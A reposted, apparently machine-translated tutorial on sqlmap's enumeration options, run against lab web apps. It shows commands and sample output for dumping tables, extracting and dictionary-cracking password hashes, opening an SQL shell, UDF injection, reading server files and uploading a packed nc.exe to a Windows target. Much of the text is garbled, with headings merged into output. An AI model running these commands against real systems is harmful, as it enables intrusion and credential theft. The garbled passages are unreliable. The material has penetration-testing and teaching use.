These parameters are used to enumerate the database management system information, data structure and data content.
1. List all data in one clickParameter:--all
Use this parameter to enumerate all the data that can be accessed. However, it is not recommended because it sends a large number of requests to enumerate the useful and useless information.
2. Enumerate database management System InformationParameters:-B or--banner
Most modern database management systems have a function or environment variable that returns the version number and last patch level of the database management system, as well as the underlying operating system information. Usually this function is version (), the environment variable is @ @version, of course, depends on the target database management system. Use the parameter "-B" or "--banner" to enumerate this information for the database management system.
The database in the following example is Oracle:
python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --banner
The partial output is:
[09:54:30] [INFO] fetching banner web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: Oracle banner: ‘Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod‘
The database in the following example is MySQL:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --banner
The partial output is:
3. List the current user[09:56:32] [INFO] fetching banner back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL >= 5.0 banner: ‘5.5.50-0ubuntu0.14.04.1‘
Parameter:--current-user
It is possible to use this parameter to enumerate the users who execute the SQL statement.
4. Enumerating the current databaseParameter:--current-db
It is possible to enumerate the database names of web App connections using this parameter.
5. Enumerate the server host namesParameter:--hostname
It is possible to use this parameter to enumerate the host names of the computers on which the database management system resides, such as:
python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
Hostname
Some of the output is as follows:
6. Detect if the current user is an administrator[xx:xx:04] [INFO] fetching server hostname [xx:xx:04] [INFO] retrieved: debian-5.0-i386 hostname: ‘debian-5.0-i386‘
Parameter:--IS-DBA
It is possible to use this parameter to detect if the current user is an administrator, or return FALSE if the administrator returns True. Such as:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --is-dba
The partial output is:
7. Enumerate users in the database management system[10:05:16] [INFO] testing if current user is DBA [10:05:16] [INFO] fetching current user [10:05:16] [WARNING] reflective value(s) found and filtering out current user is DBA: True
Parameter:--users
This parameter can be used to enumerate the users in the database management system when the current user has permission to read the system tables that contain user information in the database management system.
8. Enumerate and crack the database management system user password hash valueParameter:--passwords
This parameter can be used to enumerate the user password hash value in the database management system when the current user has read the permission of the system table containing the hash value of the user's password in the database management system. Sqlmap will list the user first, and then list the user password hash value.
Here is an example of PostgreSQL as a goal:
python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
Some of the output is as follows:
back-end Dbms:postgresql [hh:mm:38] [INFO] fetching database users password hashes do y ou want to use dictionary attack on retrieved password hashes? [y/n/q] Y [hh:mm:42] [INFO] using hash method: ' postgres_passwd ' What ' s the dictionary's location? [/software/sqlmap/txt/wordlist.txt] [HH:MM:46] [INFO] Loading dictionary from: '/software/sqlmap/txt/wordlist.txt ' does want to use common password suffixes? (slow!) [y/n] N [hh:mm:48] [info] starting dictionary attack (POSTGRES_PASSWD) [hh:mm:49] [info] found: ' Testpass ' for User: ' Te Stuser ' [hh:mm:50] [INFO] found: ' Testpass ' for User: ' Postgres ' database management system users password hashes: [*] Postgres [1]: Password hash:md5d7d880f96044b72d0bba108ace96d1e4 clear-text password:testpass [*] testuser [1]: Password hash:md599e5ea7a6f7c3269995cba3927fd0093 clear-text password:testpass
Sqlmap not only lists the password hash, but also resolves the password hash format, and asks the user whether to break the hash value through the password dictionary to find out the plaintext password.
If you want to enumerate only a specific user's password using the parameter "-U" to specify the user, "CU" can be used to represent the current user, such as:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --password -U CU
Some of the output is as follows:
9. Enumerate the user rights of the database management systemdatabase management system users password hashes: [*] root [1]: password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B clear-text password: root
Parameter:--privileges
This parameter can be used to enumerate the permissions of the user in the database management system when the current user has permission to read the system tables containing the user information in the database management system. User permissions allow you to determine which users are administrators.
If you want to enumerate only specific user permissions using the parameter "-U" to specify the user, "CU" can be used to represent the current user.
If the target is Microsoft SQL Server, this parameter lists whether each user is an administrator and does not list specific permissions for each user.
10. Enumerating the user roles of the database management systemParameter:--roles
This parameter can be used to enumerate the roles of users in a database management system when the current user has access to a system table that contains user information in the database management system.
If you want to enumerate only the roles of a specific user, use the parameter "-U" to specify the user, and "CU" can be used to represent the current user.
The official manual says this feature is only available when the target database management system is Oracle, but I am also available for testing in MySQL.
11. Enumerate all databases in the database management systemParameter:--dbs
This parameter can be used to enumerate all databases in the database management system when the current user has permission to read the system tables that contain the database information available in the database management system.
12. Enumerate all tables of the database databaseParameters:--tables 、--Exclude-sysdbs and-D
When the current user has permission to read the system tables that contain data table information from the database in the database management system, use the parameter "--tables" to enumerate all the data tables in the database specified with the parameter "-D". If the database is not specified with the parameter "-D", only the parameter "--tables" is used to enumerate all tables in all databases. Such as:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" -D DBName --tables
Use the parameter "--exclude-sysdbs" to exclude the system database. In Oracle, you specify TABLESPACE_NAME instead of the database name.
13. Enumerate all columns of the data tableParameters:--columns,-C,-T, and-D
As permission allows, the parameter "--columns" can be used to list the names and data types of all the columns in the table specified with "-T" in the database specified with "-D".
If you do not specify a database, the current database is used by default. You can also specify a few columns of interest with "-C" so that you don't have to list all the columns.
Here's an example of SQLite targeting:
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users
Some of the output is as follows:
Database: SQLite_masterdb Table: users [3 columns] +---------+---------+ | Column | Type | +---------+---------+ | id | INTEGER | | name | TEXT | | surname | TEXT | +---------+---------+
In PostgreSQL, the name of the database must be "public" or a system table. Because the data in the current database or system database can only be enumerated in PostgreSQL, the database alias of the Web App connection is always "public".
13, enumerate the database management system modeParameters:--schema and--exclude-sysdbs
Users can use this option to enumerate the schema of the database management system. The schema list contains all the databases, tables, columns, triggers, and their respective types. Similarly, you can use the parameter "--exclude-sysdbs" to exclude the system database.
The following is an example of the test object is MySQL:
Some of the output is as follows:
[...] Database:mysqltable:procs_priv[8 columns]+--------------+----------------------------------------+| Column | Type |+--------------+----------------------------------------+| Timestamp | Timestamp | | User | char (16) | | Db | CHAR (64) | | Grantor | Char (77) | | Host | char (60) | | Proc_priv | Set (' Execute ', ' Alter Routine ', ' Grant ') | | Routine_name | CHAR (64) | | Routine_type | Enum (' FUNCTION ', ' PROCEDURE ') |+--------------+----------------------------------------+[...] Database:mysqltable:ndb_binlog_index[7 columns]+-----------+---------------------+| Column | Type |+-----------+---------------------+| Position | bigint (unsigned) | | Deletes | bigint (unsigned) | | Epoch | bigint (unsigned) | | FiLe | varchar (255) | | Inserts | bigint (unsigned) | | Schemaops | bigint (unsigned) | | Updates | bigint () unsigned |+-----------+---------------------+Parameter:--count
Sometimes we just want to know how much data there is and don't want to know what the data is, so we can use that parameter at this point. Such as:
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
Some of the output is as follows:
16. List the data in the tableDatabase: testdb +----------------+---------+ | Table | Entries | +----------------+---------+ | dbo.users | 4 | | dbo.users_blob | 2 | +----------------+---------+
Parameters:--dump,-C,-T,-D 、--start 、--stop and--where
The data in the table can be enumerated when permission is allowed. Specify the database with the parameter "-D", specify the data table with the parameter "-T", and specify the target column with the parameter "-C". If you specify only a data table and no database is specified, the current database is used by default. If no column is specified, all columns in the table are enumerated.
The following example is targeted at Firebird:
python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
Some of the output is as follows:
Database: Firebird_masterdb Table: USERS [4 entries] +----+--------+------------+ | ID | NAME | SURNAME | +----+--------+------------+ | 1 | luther | blisset | | 2 | fluffy | bunny | | 3 | wu | ming | | 4 | NULL | nameisnull | +---+--------+-------------+
Use only the parameters "--dump" and "-D" to enumerate all the data in the entire database at once.
Sqlmap automatically saves the data enumerated in the parameter "--dump" to a CSV format file, which is given in the output of sqlmap, such as:
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" -D DSSchool --dump
The partial output is:
[11:15:27] [INFO] analyzing table dump for possible password hashes Database: DSSchool Table: T_SCORESYSTEMTEACHERS [2 entries] +-----+----------+-------+---------+----------+ | AGE | NAME | TITLE | ACCOUNT | PASSWORD | +-----+----------+-------+---------+----------+ | 21 | neo | ?? | 001 | 001 | | 31 | morphine | ?? | 002 | 002 | +-----+----------+-------+---------+----------+ [11:15:27] [INFO] table ‘DSSchool.T_SCORESYSTEMTEACHERS‘ dumped to CSV file ‘/home/werner/.sqlmap/output/192.168.56.102/dump/DSSchool/T_SCORESYSTEMTEACHERS.csv‘
The last line in the intercepted output is the path where the CSV file is saved.
If you want to list only some of the data, you can use the parameter "--start" and "--stop". If only want to enumerate the first data can add "--stop 1", only want to enumerate the second and third data can add "--start 1--stop 3", this is a left open right closed interval. The interval range is only valid in the blinds because the interval range is ignored in injection and union query injection based on error information.
In addition to limiting the data enumerated by the interval range, you can use the "--where" parameter to limit the enumerated data. The "--where" parameter is converted by SQLMAP to a WHERE clause, such as "--where id>3", which only lists data with a column ID greater than 3.
As you can see, Sqlmap is very flexible. You can enumerate the entire database, or you can select columns in the table carefully, and select specific data in the column.
17. Enumerate all data in all tables in all databasesParameters:--dump-all and--exclude-sysdbs
Use the parameter "--dump-all" to enumerate all the data in all tables in all databases. Similarly, you can use the parameter "--exclude-sysdbs" to exclude the system database.
Note that Microsoft SQL Server's master database is not part of the system database because some administrators store user data in this database.
18. Searching in databases, tables, columnsParameters:--search,-C,-T, and-D
You can search for the database name, search for the table name in all databases, and search for column names in all tables in all databases.
The parameter "--search" is used in conjunction with one of the following parameters:
When searching, Sqlmap asks the user for an exact search or a search. The default is to include the search, that is, the search string is included in the result and is considered hit. Exact search requires the search string to be exactly equal to the result.
19. Running the custom SQL statementParameters:--sql-query and--sql-shell
This feature allows arbitrary SQL statements to be executed, Sqlmap automatically parses the given SQL statements, selects the appropriate injection technology, and packages the given SQL statements into payload.
If the query is a SELECT statement, SQLMAP returns the results of the query. If a Web application uses a database management system that supports multi-statement queries, SQLMAP uses heap injection technology. Note, however, that a web app might not support heap queries, such as PHP when using MySQL, but heap queries are supported when using PostgreSQL.
The target of the following example is SQL Server 2000:
python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT ‘foo‘" -v 1
Some of the output is as follows:
[hh:mm:14] [INFO] fetching SQL SELECT query output: ‘SELECT ‘foo‘‘ [hh:mm:14] [INFO] retrieved: foo SELECT ‘foo‘: ‘foo‘
python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT ‘foo‘, ‘bar‘" -v 2
Some of the output is as follows:
[hh:mm:50] [INFO] fetching SQL SELECT query output: ‘SELECT ‘foo‘, ‘bar‘‘ [hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32))) [hh:mm:50] [INFO] retrieved: foo [hh:mm:50] [DEBUG] performed 27 queries in 0 seconds [hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VA RCHAR(8000)), (CHAR(32))) [hh:mm:50] [INFO] retrieved: bar [hh:mm:50] [DEBUG] performed 27 quer
As you can see, sqlmap divides the supplied SQL statement into two different SELECT statements and returns the results separately.
The parameter "--sql-shell" provides an interactive SQL statement execution environment that supports tab completion and command history. Such as:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --sql-shell
Some of the output is as follows:
13. UDF Injection[15:06:47] [INFO] calling MySQL shell. To quit type ‘x‘ or ‘q‘ and press ENTER sql-shell> select ‘foo‘; [15:07:41] [INFO] fetching SQL SELECT statement query output: ‘select ‘foo‘‘ select ‘foo‘;: ‘foo‘ sql-shell> select password from mysql.user where user=‘root‘; [15:07:42] [INFO] fetching SQL SELECT statement query output: ‘select password from mysql.user where user=‘root‘‘ select password from mysql.user where user=‘root‘; [1]: [*] *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B sql-shell> show tables; [15:11:15] [INFO] fetching SQL SELECT statement query output: ‘show tables‘ [15:11:15] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries) show tables; [1]:
Parameter:--udf-inject
The UDF is an abbreviation for "user-defined function", a high-level injection technology for MySQL and PostgreSQL, as detailed in the advanced SQL injection to operating system full Control ".
You can compile the shared libraries, DLLs (Windows), and shared Objects (Linux/unix) of MySQL or PostgreSQL and provide the paths to the Sqlmap for UDF injection by providing these files on the local path. Sqlmap will ask some questions and then upload the UDF file and create the UDF to finally execute the UDF based on the answer to the question. After the UDF injection is complete, Sqlmap deletes the uploaded UDF file.
Parameter:--shared-lib
Adding this parameter Sqlmap will ask for the shared library file path at run time.
There are many UDF files in the UDF directory of the Sqlmap installation directory, which can be used directly according to the DMBS, operating system, number of bits, and version.
14. Access file System 1. read fileParameter:--file-read
When the database management system is MySQL, PostgreSQL, or Microsoft SQL Server and the current user has read file-related permissions, it is possible to read the file. The file that is read can be either a file file or a binary file, and Sqlmap will handle it well. The following example of the target database management system is SQL Server 2005:
python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" --file-read "C:/example.exe" -v 1
Some of the output is as follows:
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2000web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005[hh:mm:50] [INFO] fetching file: ‘C:/example.exe‘[hh:mm:50] [INFO] the SQL query provided returns 3 entriesC:/example.exe file saved to:‘/software/sqlmap/output/192.168.136.129/files/C__example.exe‘
Then view the downloaded file:
2. Uploading Files$ ls -l output/192.168.136.129/files/C__example.exe -rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe $ file output/192.168.136.129/files/C__example.exe output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Parameters:--file-write and--file-dest
It is possible to upload files when the database management system is MySQL, PostgreSQL, or Microsoft SQL Server and the current user has write-file-related permissions. The uploaded file can be either a file file or a binary file, and the Sqlmap will handle it well. The following example of the target database management system is MySQL, uploaded a binary upx compressed file:
$ file/software/nc.exe.packed/software/nc.exe.packed:pe32 executable for MS Windows (c Onsole) Intel 80386 32-bit $ ls-l/software/nc.exe.packed-rwxr-xr-x 1 inquis inquis 31744 2009-mm-dd hh:mm/software/n c.exe.packed $ python sqlmap.py-u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1"--file-write "/software/nc . exe.packed "--file-dest" C:/windows/temp/nc.exe "-V 1 [...] [Hh:mm:29] [INFO] The Back-end DBMS is MySQL Web server operating system:windows 2003 or Web application Technology:ASP.NET, Microsoft IIS 6.0, ASP. 2.0.50727 back-end dbms:mysql >= 5.0.0 [...] Do you want confirmation that the file ' C:/windows/temp/nc.exe ' have been success fully written on the back-end DBMS file System? [y/n] Y [hh:mm:52] [info] retrieved:31744 [hh:mm:52] [INFO] The file has been successfully written and it size is 3174 4 b ytes, same size as the local file '/software/nc.exe.packed '
Not to be continued ...
Safety Test ===sqlmap (ii) reprint
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
